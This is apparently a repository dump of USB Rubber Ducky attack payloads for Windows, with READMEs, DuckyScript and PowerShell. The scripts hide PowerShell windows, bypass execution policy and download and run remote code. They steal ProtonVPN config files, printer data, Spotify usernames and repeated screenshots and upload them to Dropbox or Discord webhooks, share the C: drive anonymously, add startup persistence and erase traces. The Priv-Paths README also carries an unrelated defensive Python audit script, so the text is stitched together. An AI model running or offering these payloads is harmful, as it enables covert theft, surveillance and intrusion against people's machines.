"autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } function Clean-Exfil { # empty temp folder rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue # delete run box history reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f # Delete powershell history Remove-Item (Get-PSreadlineOption).HistorySavePath # Empty recycle bin 
Clear-RecycleBin -Force -ErrorAction SilentlyContinue } $F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt" Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1 DropBox-Upload -f $F1 Clean-Exfil ================================================ FILE: RubberDucky/payloads/Printer-Recon/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon

## Description

This payload is meant to exfiltrate printer information for further social engineering or driver exploitation. It can also be used to find printer web interfaces on the network.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: RubberDucky/payloads/Printer-Recon/payload.txt ================================================ REM Title: Printer-Recon REM Author: atomiczsec REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network REM Target: Windows 10 DEFINE TARGET_URL example.com DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/Priv-Paths/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Priv-Paths

## Description

A payload to enumerate unquoted service paths for privilege escalation and send them to a Discord webhook.

## Getting Started

### Dependencies

* Discord Webhook or other service that uses webhooks
* Windows 10

### Executing program

* Plug in your device
* A command will be entered in the command prompt to search for unquoted service paths so you can later exploit them for priv esc

```
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
```
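From the defensive side, the same condition can be audited and corrected before anyone enumerates it. The following added example (not part of this repository) checks service image paths and produces the quoted replacement for each finding; unlike the `findstr` filter above it covers every start mode and reports only paths whose executable portion actually contains a space. The service names and paths are constructed samples, and `split_image_path` and `audit` are hypothetical helper names.

```python
import re

# End of the executable portion of an unquoted image path.
EXE_END = re.compile(r"\.exe\b", re.IGNORECASE)

# Constructed sample inventory, shaped like name/pathname/startmode service rows.
SAMPLE_SERVICES = [
    {"name": "VendorUpdater", "startmode": "Auto",
     "pathname": r"C:\Program Files\Vendor App\updater.exe -service"},
    {"name": "QuotedAgent", "startmode": "Auto",
     "pathname": r'"C:\Program Files\Agent\agent.exe" --run'},
    {"name": "ToolSvc", "startmode": "Auto",
     "pathname": r"C:\Tools\toolsvc.exe -k run"},
    {"name": "Spooler", "startmode": "Auto",
     "pathname": r"C:\Windows\System32\spoolsv.exe"},
    {"name": "LegacySync", "startmode": "Manual",
     "pathname": r"C:\Program Files (x86)\Legacy Sync\sync.exe"},
    {"name": "NoPath", "startmode": "Disabled", "pathname": ""},
]


def split_image_path(pathname):
    """Split a service image path into (executable, arguments, was_quoted)."""
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        if end != -1:
            return p[1:end], p[end + 1:].strip(), True
    match = EXE_END.search(p)
    if match:
        return p[:match.end()], p[match.end():].strip(), False
    # No ".exe" found: assume the first whitespace-delimited token is the binary.
    head, _, tail = p.partition(" ")
    return head, tail.strip(), False


def audit(services):
    """Return one finding per service whose unquoted executable path has a space."""
    findings = []
    for svc in services:
        raw = (svc.get("pathname") or "").strip()
        if not raw:
            continue
        exe, args, quoted = split_image_path(raw)
        if quoted or " " not in exe:
            continue  # quoted, or nothing for Windows to misparse
        fixed = f'"{exe}"' + (f" {args}" if args else "")
        findings.append({
            "name": svc["name"],
            "startmode": svc.get("startmode", ""),
            "current": raw,
            "fixed": fixed,
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES):
        print(f"{f['name']} ({f['startmode']})")
        print(f"  current: {f['current']}")
        print(f"  fixed:   {f['fixed']}")
```

The `fixed` string is the value to store in the service's `ImagePath` under `HKLM\SYSTEM\CurrentControlSet\Services\<service name>`. `ToolSvc` is not reported even though the `findstr` filter would list it, because its executable path contains no space.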

## Contributing

All contributors' names will be listed here:

* atomiczsec

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: RubberDucky/payloads/Priv-Paths/payload.txt ================================================ REM Title: Priv-Paths REM Author: atomiczsec REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. REM Target: Windows 10 REM Put your discord webook in this define variable, it has the name of "d" to minimize the typing time of the rubberducky DEFINE d YOUR-DISCORD-WEBHOOK DELAY 3000 GUI r DELAY 1000 STRING cmd ENTER DELAY 500 STRING cd %HOMEPATH% ENTER DELAY 1000 STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt ENTER DELAY 1000 STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" d ENTER DELAY 200 STRING del p.txt ENTER DELAY 100 STRING exit ENTER ================================================ FILE: RubberDucky/payloads/Proton-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Proton-Hog

A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as account information.

## Description

This payload will enumerate through the ProtonVPN directories, looking for the user config file.
Then Dropbox will be used to exfiltrate the files to cloud storage.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: RubberDucky/payloads/Proton-Hog/payload.txt ================================================ REM Title: Proton-Hog REM Author: atomiczsec REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. REM Target: Windows 10 DEFINE TARGET_URL example.com DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/Proton-Hog/s.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } # Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) { try { Write-Host "The VPN folder has not been found. 
" } catch { throw $_.Exception.Message } } else { $protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN" cd $protonVpnPath Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd Get-ChildItem | cd # Upload user.config to dropbox DropBox-Upload -f "user.config" } ================================================ FILE: RubberDucky/payloads/Pwn-Drive/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Pwn-Drive

A payload to share the victim's "C:" drive to the network.

## Description

This payload will share the victim's entire "C:" drive to the entire network for further exploitation.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: RubberDucky/payloads/Pwn-Drive/c.ps1 ================================================ #Pwn-Drive #Enable Network Discovery netsh advfirewall firewall set rule group=”network discovery” new enable=yes #Enable File and Print netsh firewall set service type=fileandprint mode=enable profile=all #Setting Registry Values for allowing access to drive without credentials Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force #Sharing the Drive New-SmbShare -Name "Windows Update" -Path "C:\" ================================================ FILE: RubberDucky/payloads/Pwn-Drive/payload.txt ================================================ REM Title: Pwn-Drive REM Author: atomiczsec REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/RanFunWare/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# RanFunWare

A payload to prank your friends into thinking their computer got hit with ransomware.

## Description

This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable).

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: RubberDucky/payloads/RanFunWare/payload.txt ================================================ REM Title: RanFunWare REM Author: atomiczsec REM Description: This payload will prank your target into thinking their machine got hit with ransomware. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/RanFunWare/r.ps1 ================================================ #Hides Desktop Icons $Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 Get-Process "explorer"| Stop-Process #Changes Background #URL For the Image of your choice (Wanna Cry Ransomware Background) $url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" Invoke-WebRequest $url -OutFile C:\temp\test.jpg $setwallpapersrc = @" using System.Runtime.InteropServices; public class Wallpaper { public const int SetDesktopWallpaper = 20; public const int UpdateIniFile = 0x01; public const int SendWinIniChange = 0x02; [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); public static void SetWallpaper(string path) { SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); } } "@ Add-Type -TypeDefinition $setwallpapersrc [Wallpaper]::SetWallpaper("C:\temp\test.jpg") #Pop Up Message function MsgBox { [CmdletBinding()] param ( [Parameter (Mandatory = $True)] [Alias("m")] [string]$message, [Parameter 
(Mandatory = $False)] [Alias("t")] [string]$title, [Parameter (Mandatory = $False)] [Alias("b")] [ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] [string]$button, [Parameter (Mandatory = $False)] [Alias("i")] [ValidateSet('None','Hand','Question','Warning','Asterisk')] [string]$image ) Add-Type -AssemblyName PresentationCore,PresentationFramework if (!$title) {$title = " "} if (!$button) {$button = "OK"} if (!$image) {$image = "None"} [System.Windows.MessageBox]::Show($message,$title,$button,$image) } MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning ================================================ FILE: RubberDucky/payloads/Screen-Shock/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: RubberDucky/payloads/Screen-Shock/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Screen-Shock This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) ## Description This payload uses iwr to download 2 files * I.bat * c.ps1 **I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup **c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds Then the contents will then be sent to the DropBox for viewing pleasure ## Getting Started ### Dependencies * Pastebin or other file sharing service, Dropbox * Windows 10 * [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload

(back to top)

### Executing program * Plug in your device * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ```

## Contributing

All contributors names will be listed here:

[atomiczsec](https://github.com/atomiczsec)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================
FILE: RubberDucky/payloads/Screen-Shock/c.ps1
================================================
function DropBox-Upload {

    [CmdletBinding()]
    param (
        [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
        [Alias("f")]
        [string]$SourceFilePath
    )
    $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN"   # Replace with your DropBox Access Token
    $outputFile = Split-Path $SourceFilePath -leaf
    $TargetFilePath="/$outputFile"
    $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
    $authorization = "Bearer " + $DropBoxAccessToken
    $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
    $headers.Add("Authorization", $authorization)
    $headers.Add("Dropbox-API-Arg", $arg)
    $headers.Add("Content-Type", 'application/octet-stream')
    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}

while(1){

    Add-Type -AssemblyName System.Windows.Forms,System.Drawing

    $screens = [Windows.Forms.Screen]::AllScreens

    $top    = ($screens.Bounds.Top    | Measure-Object -Minimum).Minimum
    $left   = ($screens.Bounds.Left   | Measure-Object -Minimum).Minimum
    $width  = ($screens.Bounds.Right  | Measure-Object -Maximum).Maximum
    $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum

    $bounds   = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)
    $bmp      = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)
    $graphics = [Drawing.Graphics]::FromImage($bmp)

    $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)

    $bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png")
    $graphics.Dispose()
    $bmp.Dispose()

    start-sleep -Seconds 15
    "$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload
}

================================================
FILE: RubberDucky/payloads/Screen-Shock/payload.txt
================================================
REM Title: Screen-Shock
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
REM Target: Windows 10
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH

================================================
FILE: RubberDucky/payloads/Screen-Shock/placeholder
================================================

================================================
FILE: RubberDucky/payloads/Spotify-Spy/README.md
================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Spotify-Spy

This payload is meant to exfiltrate Spotify usernames on the device. Some people are too afraid to ask for their Spotify or playlist, so here is a sneaky way to do so.

## Description

Have you ever been too afraid to ask your co-worker what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their Spotify username for you so you don't have to socially interact with anyone!

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================
FILE: RubberDucky/payloads/Spotify-Spy/SS.ps1
================================================
#Spotify-Spy

# See if file is a thing
Test-Path -Path "$env:APPDATA\Spotify\Users"

# Create variable for file name
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt"

# Gets the name of the spotify user
cd "$env:APPDATA\Spotify\Users"
Get-ChildItem > $F1

# Copy Spotify User to Temp Directory to get sent to Dropbox
Copy-Item "$F1" -Destination "$env:tmp/$F1"

function DropBox-Upload {

    [CmdletBinding()]
    param (
        [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
        [Alias("f")]
        [string]$SourceFilePath
    )
    $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"   # Replace with your DropBox Access Token
    $outputFile = Split-Path $SourceFilePath -leaf
    $TargetFilePath="/$outputFile"
    $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
    $authorization = "Bearer " + $DropBoxAccessToken
    $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
    $headers.Add("Authorization", $authorization)
    $headers.Add("Dropbox-API-Arg", $arg)
    $headers.Add("Content-Type", 'application/octet-stream')
    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}

DropBox-Upload -f "$env:tmp/$F1"
rm $F1

$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)

================================================
FILE: RubberDucky/payloads/Spotify-Spy/payload.txt
================================================
REM Title: Spotify-Spy
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

================================================
FILE: RubberDucky/payloads/Water-UnMark/README.md
================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Water-UnMark

A payload to get rid of the ugly Windows activation watermark.

## Description

This script will get rid of the ugly Windows watermark. This script will automatically reboot the device. This is not activating your computer!!

## Getting Started

### Dependencies

* Unactivated Windows 10

### Executing program

* Plug in your device

```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```

## Contributing

All contributors names will be listed here:

[atomiczsec](https://github.com/atomiczsec)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================
FILE: RubberDucky/payloads/Water-UnMark/payload.txt
================================================
REM Title: Water-UnMark
REM Author: atomiczsec
REM Target OS: Windows 10
REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
DELAY 2000
GUI r
DELAY 100
STRING powershell Start-Process powershell -verb runAs
DELAY 1000
ALT Y
DELAY 1000
STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
ENTER
DELAY 100
STRING Restart-Computer -Force
ENTER

================================================
FILE: RubberDucky/payloads/Water-UnMark/placeholder
================================================

================================================
FILE: RubberDucky/payloads/cApS-Troll/README.md
================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# cApS-Troll

This payload is meant to prank your victim with TURNING on AND off CAPS LOCK

## Description

This payload is meant to prank your victim with TURNING on AND off CAPS LOCK

## Getting Started

### Dependencies

* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10, 11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

### Executing program

* Plug in your device
* Define the `DEFINE TARGET_URL example.com`
* Device will download both files and place them in proper directories to then run the script

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
```

## Contributing

All contributors names will be listed here:

[atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================
FILE: RubberDucky/payloads/cApS-Troll/a.ps1
================================================
while (1){
    Start-Sleep -Second 45
    $wsh = New-Object -ComObject WScript.Shell
    $wsh.SendKeys('{CAPSLOCK}')
    Start-Sleep -Second 15
    $wsh = New-Object -ComObject WScript.Shell
    $wsh.SendKeys('{CAPSLOCK}')
    Start-Sleep -Second 15
    $wsh = New-Object -ComObject WScript.Shell
    $wsh.SendKeys('{CAPSLOCK}')
    Start-Sleep -Second 15
    $wsh = New-Object -ComObject WScript.Shell
    $wsh.SendKeys('{CAPSLOCK}')
    Start-Sleep -Second 15
    $wsh = New-Object -ComObject WScript.Shell
    $wsh.SendKeys('{CAPSLOCK}')
}

================================================
FILE: RubberDucky/payloads/cApS-Troll/payload.txt
================================================
REM Title: cApS-Troll
REM Author: atomiczsec
REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
REM Target: Windows 10
DEFINE TARGET_URL example.com
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

================================================
FILE: RubberDucky/payloads/placeholder
================================================